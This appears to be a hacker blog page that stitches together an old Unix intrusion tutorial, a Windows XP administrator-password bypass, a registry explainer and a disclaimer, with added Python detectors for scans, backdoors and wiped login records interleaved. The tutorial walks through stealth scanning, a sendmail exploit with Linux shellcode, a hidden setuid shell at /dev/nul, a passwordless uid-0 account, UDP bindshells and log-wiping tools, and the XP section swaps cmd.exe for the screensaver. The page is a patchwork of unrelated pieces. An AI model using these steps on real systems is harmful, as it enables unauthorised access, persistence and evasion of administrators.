Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.

But there is a problem here... such information can be faked!

It's difficult to really know what daemons they are running, but we can know FOR SURE
what the operating system is:

bash-2.03$ nmap -sS -O target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3

TCP Sequence Prediction: Class=random positive increments
Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds

Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!

We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.

This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what the OS is there and it's very difficult to avoid it.

Also take a look at the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.

Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:

bash-2.03$ man nmap
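
How the half-open scan above looks from the defending side, as an added example that is not part of the original text: daemons never see a finished connection, but a packet filter that logs inbound SYN packets does. The log format (netfilter LOG target), the addresses, the 60-second window and the 15-port threshold are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

TCP_FLAGS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG"}
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8}) \S+ kernel: .*?SRC=(?P<src>\S+) .*?"
    r"PROTO=TCP SPT=\d+ DPT=(?P<dpt>\d+) (?P<rest>.*)$"
)


def build_sample_log():
    """Constructed input: one fast scanner and one ordinary client."""
    fmt = ("{ts} target kernel: IN=eth0 OUT= SRC={src} DST=198.51.100.5 LEN=40 "
           "TTL=52 PROTO=TCP SPT={spt} DPT={dpt} WINDOW=1024 RES=0x00 SYN URGP=0")
    base = datetime(2000, 9, 24, 9, 18, 0)

    def stamp(t):
        return t.strftime("%b %d %H:%M:%S")

    scan_ports = [21, 22, 23, 25, 53, 79, 80, 110, 111, 113, 119, 139,
                  143, 443, 512, 513, 514, 515, 540, 635, 1080, 2049, 6000, 8080]
    # The scanner: 24 different ports probed within three seconds.
    lines = [fmt.format(ts=stamp(base + timedelta(seconds=i // 8)),
                        src="192.0.2.77", spt=40000 + i, dpt=port)
             for i, port in enumerate(scan_ports)]
    # An ordinary client: repeated web requests and one mail delivery.
    for i in range(5):
        lines.append(fmt.format(ts=stamp(base + timedelta(seconds=90 * i)),
                                src="203.0.113.9", spt=50000 + i, dpt=80))
    lines.append(fmt.format(ts=stamp(base + timedelta(seconds=30)),
                            src="203.0.113.9", spt=50010, dpt=25))
    return "\n".join(lines)


def parse_syn_events(log_text, year=2000):
    """Return (time, source, destination port) for every SYN-only packet logged.

    Syslog timestamps carry no year, so one is assumed.
    """
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        flags = {tok for tok in m["rest"].split() if tok in TCP_FLAGS}
        if flags != {"SYN"}:
            continue  # replies (SYN ACK) and established traffic are not probes
        ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], int(m["dpt"])))
    return events


def detect_port_scans(events, window=timedelta(seconds=60), min_ports=15):
    """Flag sources that touch at least min_ports distinct ports inside one window.

    Returns {source: largest number of distinct ports seen in any window}.
    """
    by_src = defaultdict(list)
    for ts, src, dpt in events:
        by_src[src].append((ts, dpt))
    findings = {}
    for src, hits in by_src.items():
        hits.sort()
        in_window = defaultdict(int)   # port -> packets currently inside the window
        start = best = 0
        for ts, dpt in hits:
            in_window[dpt] += 1
            while ts - hits[start][0] > window:   # slide the left edge forward
                old = hits[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            best = max(best, len(in_window))
        if best >= min_ports:
            findings[src] = best
    return findings


if __name__ == "__main__":
    for src, ports in detect_port_scans(parse_syn_events(build_sample_log())).items():
        print("possible port scan from %s: %d ports within 60 seconds" % (src, ports))
```

A slow scan spread over hours stays under this threshold, so the window and port count need tuning against the traffic a host normally receives.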


How to upload and compile programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The most obvious and simple way is using FTP:

bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.


But this is not a really good way. It can create logs that will make the admin to detect us.

Avoid uploading it with FTP as you can, use cut&paste instead.

Here's how to make it:

we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.

Then open another terminal (i mean without x windows, CTRL+ALT+Fx to escape from xwindows to console x,
ALT+Fx to change to another terminal, ALT+F7 to return to xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.

To cut text from the screen, you need to install the gpm package from your linux distribution.
This program lets you select and cut text with your mouse.

If cut&paste doesn't work, you can also type it by hand (they aren't usually large).

Once you get the .c file there, here's how to compile:

sh-2.03$ gcc program.c -o program

and execute:

sh-2.03$ ./program



Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~

This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.

An exploit is a piece of code that exploits a vulnerability in a piece of software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easily
exploitable. If your target has an old version, you'll probably get in easily.

When we exploit a security bug, we can get:

- a normal shell (don't know what a shell is? read a book of unix!)
a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited privileges.

- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.

These are some exploit databases i suggest you to visit:

http://www.hack.co.za/
http://www.r00tabega.org/
http://www.rootshell.com/
http://www.securityfocus.com/
www.insecure.org/sploits.html

Every exploit is different to use, so read its text and try them.
They usually come in .c language.

The most standard and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow works.
Read "Smashing The Stack For Fun And Profit" by Aleph One to learn it.

Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.

We edit the .c file we've downloaded and look for something like this:

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.

You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smashing The Stack For Fun And Profit).

IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
should you continue without their permission, you'd be infringing the law and
i'm not responsible for your craziness in any way!!!

You should have now the shell account, this is the time to use it!

everything i explain on this section, do it through your shell account:

bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from .
sh-2.03$

Here is a example of a buffer overflow (that doesn't really exist):

we compile it:
sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! :-) (just kidding)

There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.

Remember to avoid uploading it with FTP as you can.

Another kind of exploit is the one that gives you access to the password file.
If a host has port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/her/its username
and password. Then use the su command to become root.

sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
Welcome to target.edu

login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$

Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!

The problem here is that it is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictionary word
or a person's name.

I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that lusers' passwords are mostly easily cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator privileges
with sudo or something.

To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal.
Of course, I haven't listed all the exploit kinds that exist, only the most common.



Putting backdoors
~~~~~~~~~~~~~~~~~

Ok, we've rooted the system. Then what?

Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.

Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scientologists, bsa.org, microsoft, etc. Not a bunch of poor educators.

REMEMBER: ask for permission first!

No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)

Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.

So now we're root and we can do everything, we shall put some backdoors that let us get back in.


Anyway, i'll explain the basics of it.

1.How to make a sushi:

To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
permissions:

sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
sh-2.03$ cd /dev
sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.

We've finished our 'duty', let's logout:
sh-2.03$ exit

Then, when we come back some day:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
We're superluser again!


There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.


2.How to add fake lusers.

You gotta manipulate the users file: /etc/passwd
try this:
sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.

This is what a luser line looks like: luser:passwd:uid:gid:comment:startdir:shell

When uid=0 and gid=0, that luser gets superluser privileges.

Then we add a line like this:

dood::0:0:dood:/:/bin/sh (put it in a hidden place)


So, once we get a shell, we type:
sh-2.03$ su dood
sh-2.03$ whoami
dood

And now we're root because dood's uid=0 and gid=0.

Smart admins usually look for anomalies in /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.

I haven't got such a program at my site, but it shouldn't be difficult to develop.


3.How to put a bindshell.

A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The thing is that this is our own daemon. The good bindshells will listen to a UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:

If the admin uses a scanner to see what TCP ports are open, he wouldn't find anything!
They rarely remember UDP exists.

You can get a UDP bindshell coded by !hispahack from my site.
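
Each of the three tricks in this section (a setuid copy of a shell hidden in /dev, an extra uid 0 line in /etc/passwd, a daemon listening on UDP) leaves something an admin can check for. The audit below is an added example, not part of the original text; it runs on constructed input, and the Linux /proc/net/udp layout, the skipped /dev subdirectories and the expected-port list are assumptions.

```python
import os
import stat
import tempfile

# Constructed /etc/passwd content; the last line is the kind of entry described above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/false
luser:x:1000:100:Local User:/home/luser:/bin/bash
dood::0:0:dood:/:/bin/sh
"""

# Constructed /proc/net/udp content (Linux). Port 0x0035 is DNS, 0x7A69 is 31337.
SAMPLE_PROC_NET_UDP = """\
   sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   12: 00000000:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1101 2 0000000000000000 0
   27: 00000000:7A69 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1377 2 0000000000000000 0
   31: 0100007F:8FC1 0100007F:0035 01 00000000:00000000 00:00000000 00000000  1000        0 1402 2 0000000000000000 0
"""


def audit_passwd(text):
    """Flag accounts other than root with uid 0, and accounts with no password."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if uid.strip().isdigit() and int(uid) == 0 and name != "root":
            findings.append((name, "uid 0 but not root"))
        if password == "":
            findings.append((name, "empty password field"))
    return findings


def audit_dev(root, skip=("shm", "mqueue")):
    """Flag regular files under a device directory, which should hold device nodes.

    Subdirectories in `skip` are memory-backed mounts where regular files are
    normal (an assumption about the system being audited).
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip]
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISREG(mode):
                setuid = bool(mode & stat.S_ISUID)
                findings.append((path, "setuid regular file" if setuid else "regular file"))
    return findings


def audit_udp(proc_net_udp, expected_ports=frozenset()):
    """List unconnected UDP sockets on unexpected ports as (port, uid, inode)."""
    findings = []
    for line in proc_net_udp.splitlines()[1:]:
        f = line.split()
        if len(f) < 10 or f[2] != "00000000:0000":
            continue  # skip short lines and sockets connected to a peer
        port = int(f[1].rsplit(":", 1)[1], 16)
        if port not in expected_ports:
            findings.append((port, int(f[7]), int(f[9])))
    return findings


def run_demo():
    """Run all three checks against constructed fixtures and return the findings."""
    with tempfile.TemporaryDirectory() as fake_dev:
        hidden = os.path.join(fake_dev, "nul")          # look-alike of /dev/null
        open(hidden, "wb").close()
        os.chmod(hidden, 0o4775)
        os.mkdir(os.path.join(fake_dev, "shm"))
        open(os.path.join(fake_dev, "shm", "scratch"), "wb").close()
        dev = [(os.path.basename(p), why) for p, why in audit_dev(fake_dev)]
    return {
        "passwd": audit_passwd(SAMPLE_PASSWD),
        "dev": dev,
        "udp": audit_udp(SAMPLE_PROC_NET_UDP, expected_ports={53}),
    }


if __name__ == "__main__":
    for check, findings in run_demo().items():
        for finding in findings:
            print(check, finding)
```

On a live host the same functions take the contents of /etc/passwd, the path /dev and the contents of /proc/net/udp; the inode in a UDP finding can be matched against /proc/<pid>/fd to identify the owning process.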


Cleaning up
~~~~~~~~~~~

Remember when we logged in to target.edu as luser, and used su to become root?
Take a look at this line:

Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.

Yes, that was displayed by the target box when we logged in there.
It refers to the last login that the real luser did.

So, what will be displayed when luser logs in again?

Last login: Sun Sep 24 10:32:14 from .

Then luser writes a mail to the admin:

"Some strange thing has happened: when I logged in today, I read a line like this:

Last login: Sun Sep 24 10:32:14 from .

Does it mean I did login yesterday? It can't be, I don't work on sundays!
I think it's a bug and this is your fault."

The admin responds to luser:

"That wasn't a bug! this line means someone accessed the system using your password, don't
worry about that, we got his IP. That means we can ask his ISP what phone number called
at 10:32 and get . Then we shall call the police and he'll get busted"

So you'll get busted because luser was a bit clever (sometimes happens).

So we gotta find a way to delete that.

This information can be stored in:

/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog

and we can erase it using lled (get it from my site)

lled has a built-in help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.

There is also some information we'd like to erase:

Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its syntax is very similar to lled.
you can get it from my site.


The who command shows us (and the admin) which lusers are logged in at the moment.
What if we login and the admin is there?

sh-2.03$ who
root tty1 Sep 25 18:18

Then we shall use zap2. If you logged in as 'luser', then type:

sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$

And luser has never been here.
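
Edited login records are not invisible to an admin who reads the raw file instead of trusting who and last. The check below is an added example, not part of the original text: it assumes the 384-byte glibc/Linux utmp record layout and a cleaner that blanks records in place (the usual approach of zap-style tools), and it runs on a constructed wtmp image.

```python
import struct

# Assumed layout: the 384-byte utmp/wtmp record used by glibc on Linux.
# type, pid, line, id, user, host, exit(2 shorts), session, tv_sec, tv_usec,
# addr_v6(4 ints), unused
UTMP = struct.Struct("<hxxi32s4s32s256shhiii4i20s")
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8


def make_record(ut_type, line, user, host, tv_sec, pid=0):
    """Build one record (used only to construct the sample below)."""
    return UTMP.pack(ut_type, pid, line.encode(), b"", user.encode(),
                     host.encode(), 0, 0, 0, tv_sec, 0, 0, 0, 0, 0, b"")


def build_sample_wtmp():
    """Constructed wtmp image: a boot, a root console login, one blanked
    record, and the logout that belonged to the blanked login."""
    return b"".join([
        make_record(BOOT_TIME, "~", "reboot", "", 969800000),
        make_record(USER_PROCESS, "tty1", "root", "", 969906000, pid=412),
        bytes(UTMP.size),
        make_record(DEAD_PROCESS, "pts/0", "", "", 969910000, pid=977),
    ])


def text_field(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def scan_wtmp(data):
    """Return (record index, reason) for records that suggest tampering."""
    findings, open_lines, last_ts = [], set(), 0
    for i in range(len(data) // UTMP.size):
        raw = data[i * UTMP.size:(i + 1) * UTMP.size]
        if not any(raw):
            # login(1) and init never write an all-zero record
            findings.append((i, "zero-filled record"))
            continue
        fields = UTMP.unpack(raw)
        ut_type, line, tv_sec = fields[0], text_field(fields[2]), fields[9]
        if tv_sec < last_ts:
            # wtmp is append-only, so time should not run backwards
            findings.append((i, "timestamp earlier than previous record"))
        last_ts = max(last_ts, tv_sec)
        if ut_type == BOOT_TIME:
            open_lines.clear()
        elif ut_type == USER_PROCESS:
            open_lines.add(line)
        elif ut_type == DEAD_PROCESS:
            if line in open_lines:
                open_lines.discard(line)
            else:
                findings.append((i, "logout on %s without a login record" % line))
    if len(data) % UTMP.size:
        findings.append((len(data) // UTMP.size, "truncated trailing record"))
    return findings


if __name__ == "__main__":
    for index, reason in scan_wtmp(build_sample_wtmp()):
        print("record %d: %s" % (index, reason))
```

Real files contain some noise, for example logouts at the start of a rotated wtmp, so findings are leads to compare against sshd, su and process-accounting logs kept on another host.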

hack windows XP password!!

Here are the steps involved to Hack the Windows XP Administrator Password.
1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way they are given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit
Wait, it's not over. Read the rest to find out how to Hack the Windows XP Administrator Password.
A brief explanation of what you are currently doing here:
You are navigating to the Windows system directory where the system files are stored. Next you are creating a temporary directory called temphack. After which you are copying or backing up the logon.scr and cmd.exe files into temphack, then you are deleting the logon.scr file and renaming the cmd.exe file to logon.scr.
So basically you are telling Windows to back up the command program and the screen saver file. Then we edited the settings so that when Windows loads the screen saver, we will get an unprotected DOS prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want to change the password to pass, then type in the following command
net user clazh pass
This will change the admin password to pass. That's it, you have successfully hacked the Windows XP Administrator Password. Now you can log in using the hacked Windows XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Windows XP Administrator Password to cover your tracks.
1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way they are given
3. cd\
4. cd\ windows\system32\temphack
5. copy logon.scr C:\windows\system32\logon.scr
6. copy cmd.exe C:\windows\system32\cmd.exe
7. exit
Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into the system32 directory; click Yes to overwrite the modified files.
Via internetbusinessdaily.net
Note to administrators: You can block the entire password change thing with just a little tweak in the local security policy (Control Panel -> Administrative Tools, works only for the Administrators group), which will disallow any change in password even if you are the Admin (you can put a number of other restrictions too), but be careful to give other users limited accounts. After you have done this, the above screensaver technique will fail.
Update: Christian Mohn points out that the above method is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 - because of the updated “user rights management” in NTFS - file level rights etc. This does not work on a system using NTFS.

vat is registry??

The Registry Torn Apart
The registry is a hierarchical database that contains virtually all information about your computer's configuration. Under previous versions of Windows, those settings were contained in files like config.sys, autoexec.bat, win.ini, system.ini, control.ini and so on. From this you can understand how important the registry is. The structure of the registry is similar to the ini files structure, but it goes beyond the concept of ini files because it offers a hierarchical structure, similar to the folders and files on hard disk. In fact the procedure to get to the elements of the registry is similar to the way to get to folders and files. In this section I will be examining the Win95\98 registry only, although NT is quite similar.
The Registry Editor
The Registry Editor is a utility with the filename regedit.exe that allows you to see, search, modify and save the registry database of Windows. The Registry Editor doesn't validate the values you are writing: it allows any operation. So you have to pay close attention, because no error message will be shown if you make a wrong operation. To launch the Registry Editor simply run RegEdit.exe (under WinNT run RegEdt32.exe with administrator privileges). The registry editor is divided into two sections: in the left one there is a hierarchical structure of the database (the screen looks like Windows Explorer), in the right one there are the values. The registry is organized into keys and subkeys. Each key contains value entries; each one has a name, a type or a class and the value itself. The name is a string that identifies the value to the key. The length and the format of the value depend on the data type.
As you can see with the Registry Editor, the registry is divided into five principal keys: there is no way to add or delete keys at this level. Only two of these keys are effectively saved on hard disk: HKEY_LOCAL_MACHINE and HKEY_USERS. The others are just branches of the main keys or are dynamically created by Windows.
HKEY_LOCAL_MACHINE This key contains any hardware, applications and services information. Some hardware information is updated automatically while the computer is booting. The data stored in this key is shared with any user. This handle has many subkeys:
- Config: Contains configuration data for different hardware configurations.
- Enum: This is the device data. For each device in your computer, you can find information such as the device type, the hardware manufacturer, device drivers and the configuration.
- Hardware: This key contains a list of serial ports, processors and floating point processors.
- Network: Contains network information.
- Security: Shows you network security information.
- Software: This key contains data about installed software.
- System: It contains data that checks which device drivers are used by Windows and how they are configured.
HKEY_CLASSES_ROOT This key is an alias of the branch HKEY_LOCAL_MACHINE\Software\Classes and contains OLE, drag'n'drop, shortcut and file association information.
HKEY_CURRENT_CONFIG This key is also an alias. It contains a copy of the branch HKEY_LOCAL_MACHINE\Config, with the current computer configuration.
HKEY_DYN_DATA Some information stored in the registry changes frequently, so Windows maintains part of the registry in memory instead of on the hard disk. For example it stores PnP information and computer performance. This key has two sub keys:
- Config Manager: This key contains all hardware information problem codes, with their status. There is also the sub key HKEY_LOCAL_MACHINE\Enum, but written in a different way.
- PerfStats: It contains performance data about system and network.
HKEY_USERS This important key contains the sub key .Default and another key for each user that has access to the computer. If there is just one user, only the .Default key exists. Each sub key maintains the preferences of each user, like the desktop colors, the fonts used, and also the settings of many programs. If you open a user subkey you will find five important subkeys:
- AppEvent: It contains the path of audio files that Windows plays when some events happen.
- Control Panel: Here are the settings defined in the Control Panel. They used to be stored in win.ini and control.ini.
- Keyboard Layouts: It contains an entry that identifies the current keyboard layout as it is set in the Control Panel.
- Network: This key stores subkeys that describe current and recent network shortcuts.
- RemoteAccess: The settings of Remote Access are stored here.
- Software: Contains all software settings. This data was stored in win.ini and private .ini files.
HKEY_CURRENT_USER It is an alias to the current user of HKEY_USERS. If your computer is not configured for multi-user usage, it points to the subkey .Default of HKEY_USERS.
Description of .reg file
Here I am assuming that you already have a .reg file on your hard disk and want to know more about how it is structured. Do not double click the .reg file or its content will be added to the registry (of course, a warning message will pop up first). To view the contents of the .reg file, open it in Notepad. To do so, first launch Notepad by going to Start>Programs>Accessories>Notepad. Then open the .reg file through the Open menu.
The thing that differentiates .reg files from other files is the word REGEDIT4. It is the first word in all .reg files. If this word is not there, the registry editor cannot recognize the file as a .reg file. Then follows the key declaration, which has to be done within square brackets and with the full path. If the key does not exist then it will be created. After the key declaration you will see a list of values that have to be set in the particular key in the registry. The values look like this:
"value name"=type:value
Value name is in double quotes. Type can be absent for string values, is dword: for dword values and hex: for binary values, and for all other values you have to use the code hex(#): , where # indicates the API code of the type.

Published on Black Sun Research Facility
Important Note: expand string has API code = 2 and extended string has API code = 7.
As you can see, strings are in double quotes, dword is hexadecimal and binary is a sequence of hexadecimal byte pairs, with a comma between each. If you want to add a back slash into a string remember to repeat it two times, so the value "c:\Windows" will be "c:\\Windows". Before writing a new .reg file, make sure you do this, or else you will get an error message.
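
Since double-clicking merges a .reg file into the registry, it is worth reading what the file would set before it gets that far. The parser below is an added example, not part of the original text; it follows the REGEDIT4 rules described above (header, bracketed key, string, dword:, hex: and hex(#): values, doubled backslashes), and also accepts "@" for a key's default value and a trailing backslash as a line continuation, which the text does not mention. The sample file and its key names are constructed.

```python
import re

# Constructed sample file; the key and value names are placeholders.
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\Software\ExampleVendor\ExampleApp]
@="Example default value"
"InstallDir"="c:\\Windows"
"Retries"=dword:0000000a
"Blob"=hex:de,ad,be,\
  ef
"Path"=hex(2):25,54,45,4d,50,25,00
'''

VALUE_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<data>.*)$')
HEX_RE = re.compile(r'^hex(?:\((?P<code>[0-9a-fA-F]+)\))?:(?P<bytes>.*)$')


def unescape(s):
    """Undo the doubling of backslashes (and \\" for quotes) inside a string."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_data(data):
    """Turn the text after '=' into a (type, value) pair."""
    if data.startswith('"'):
        if len(data) < 2 or not data.endswith('"'):
            raise ValueError("unterminated string: %r" % data)
        return ("string", unescape(data[1:-1]))
    if data.startswith("dword:"):
        return ("dword", int(data[len("dword:"):], 16))
    m = HEX_RE.match(data)
    if m:
        raw = bytes(int(b, 16) for b in m["bytes"].split(",") if b.strip())
        kind = "hex(%s)" % m["code"] if m["code"] else "hex"
        return (kind, raw)
    raise ValueError("unknown value type: %r" % data)


def parse_reg(text):
    """Parse REGEDIT4 text into {key path: {value name: (type, value)}}."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != "REGEDIT4":
        raise ValueError("missing REGEDIT4 header")
    result, key, pending = {}, None, ""
    for line in lines[1:]:
        line = pending + line.strip()
        pending = ""
        if line.endswith("\\"):          # long hex values continue on the next line
            pending = line[:-1]
            continue
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            result.setdefault(key, {})
            continue
        m = VALUE_RE.match(line)
        if not m or key is None:
            raise ValueError("cannot parse line: %r" % line)
        name = "@" if m["default"] else unescape(m["name"])
        result[key][name] = parse_data(m["data"])
    return result


if __name__ == "__main__":
    for key, values in parse_reg(SAMPLE_REG).items():
        print(key)
        for name, (kind, value) in values.items():
            print("  %-12s %-8s %r" % (name, kind, value))
```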
Command Line Registry Arguments
- FILENAME.REG to merge a .reg file with the registry
- /L:SYSTEM to specify the position of SYSTEM.DAT
- /R:USER to specify the position of USER.DAT
- /e FILENAME.REG [KEY] to export the registry to a file. If the key is specified, the whole branch will be exported.
- /c FILENAME.REG to substitute the entire registry with a .reg file
- /s to work silently, without prompt information or warnings.
That wraps up the Windows Registry


legal disclaimer

Any actions and or activities related to the
material contained within this Website is solely your responsibility.
The misuse of the information in this website can result in
criminal charges brought against the persons in question. The
authors will not be held responsible in the event any criminal
charges be brought against any individuals misusing the
information in this website to break the law.


This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials. These materials are for educational and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator nor blogger is responsible for the comments posted on this website.
This site will Never harm u By giving Out Trojans, Virus or any related stuff. We do not Promote Hacking ! But Lets one be aware of all the Possibilities around. N promotes the way to Curb it to Protect urself.Rest is all Tricks n Tips..
~ cheers ~